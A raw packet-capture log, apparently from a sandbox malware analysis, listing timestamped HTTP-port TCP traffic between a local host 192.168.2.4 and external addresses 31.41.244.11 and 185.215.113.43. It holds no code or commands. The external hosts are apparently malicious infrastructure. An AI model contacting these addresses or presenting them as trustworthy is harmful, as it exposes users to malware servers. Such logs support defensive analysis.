                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.361567974 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.361629009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.361686945 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.362557888 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.362622023 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.362699032 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.362756968 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.363627911 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.363739014 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.363765955 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.363816023 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.364625931 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.364675999 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.364700079 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.365690947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.365808010 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.365833044 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.366108894 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.366744041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.366791964 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.366813898 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.367784023 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.367808104 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.367877007 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.367990017 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.368784904 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.368908882 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.369815111 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.369842052 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.372068882 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:24.898093939 CET4977780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:24.898282051 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.017839909 CET8049802185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.017931938 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.018079996 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.018110991 CET8049777185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.018654108 CET4977780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:25.137593985 CET8049802185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:29.022934914 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.055043936 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.055306911 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.175673008 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.175685883 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.175745010 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.175782919 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.175954103 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:34.296165943 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.499994993 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500015020 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500021935 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500096083 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500107050 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500118017 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500128984 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500138044 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500230074 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500230074 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500242949 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.500294924 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.503798008 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.503864050 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.503914118 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.504085064 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.619782925 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.619860888 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.619940042 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.619996071 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.624130964 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.624183893 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.692497969 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.692512035 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.692620993 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.696732998 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.696744919 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.696789980 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.703186989 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.703249931 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.703365088 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.703411102 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.712548018 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:35.712598085 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:37.929316044 CET4983280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:38.049221039 CET8049832185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:38.049319029 CET4983280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:38.049490929 CET4983280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:38.168977022 CET8049832185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.398313999 CET8049832185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.398379087 CET4983280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.705463886 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.705764055 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.825329065 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.825402021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.825700998 CET804982331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.825700998 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.825751066 CET4982380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:39.945230007 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147845030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147888899 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147922993 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147927046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147941113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.147965908 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148000002 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148036003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148036957 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148066044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148101091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148135900 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148159027 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148194075 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148226976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148252010 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.148289919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.267731905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.267776012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.267924070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.271887064 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.272002935 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.272028923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.272090912 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.339687109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.339816093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.339977980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.343863010 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.343991041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.345345020 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.345427990 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.345499992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.345568895 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.353713989 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.353842020 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.353905916 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.362149000 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.362202883 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.362221956 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.362307072 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.370516062 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.370651007 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.370676041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.374192953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.378922939 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.379045010 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.379066944 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.379159927 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.387260914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.387394905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.387653112 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.395725012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.395762920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.395876884 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.403228998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.403335094 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.403399944 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.403458118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.410864115 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.411009073 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.411076069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.418087006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.418355942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.418426037 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.459743023 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.459783077 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.459867001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.459867001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.531708002 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.531747103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.531776905 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.532073975 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.533865929 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.533936977 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.533967018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.534032106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.538348913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.538523912 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.540009975 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.540165901 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.540198088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.540393114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.544529915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.544611931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.544692039 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.547080994 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.549129009 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.549216986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.549252033 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.549380064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.553509951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.553638935 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.553642035 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.553757906 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.557965040 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.558036089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.558068037 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.558362007 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.562441111 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.562563896 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.562680006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.562774897 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.566976070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.567012072 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.567084074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.567084074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.571396112 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.571430922 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.571469069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.572113991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.575742006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.575805902 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.575881958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.575984001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.580270052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.580357075 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.580390930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.580615044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.584726095 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.584779978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.584994078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.589121103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.589231014 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.589304924 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.591451883 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.592907906 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.592941999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.592973948 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.593384027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.596530914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.596565008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.596600056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.599237919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.600101948 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.600203991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.600248098 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.600482941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.603804111 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.603837967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.603933096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.607377052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.607513905 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.607520103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.607574940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.611187935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.611222982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.611468077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.614695072 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.614811897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.614846945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.615008116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.618349075 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.618441105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.618515015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.618690968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.621994972 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.622167110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.622292042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.622359991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.625751019 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.627388954 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.723367929 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.723444939 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.723591089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.723711967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.724783897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.724833965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.724895954 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.724941969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.727746964 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.727797985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.728725910 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.728770018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.728842974 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.728888988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.731431007 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.731472969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.731573105 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.731621027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.734210014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.734245062 CET804983831.41.244.11192.168.2.4
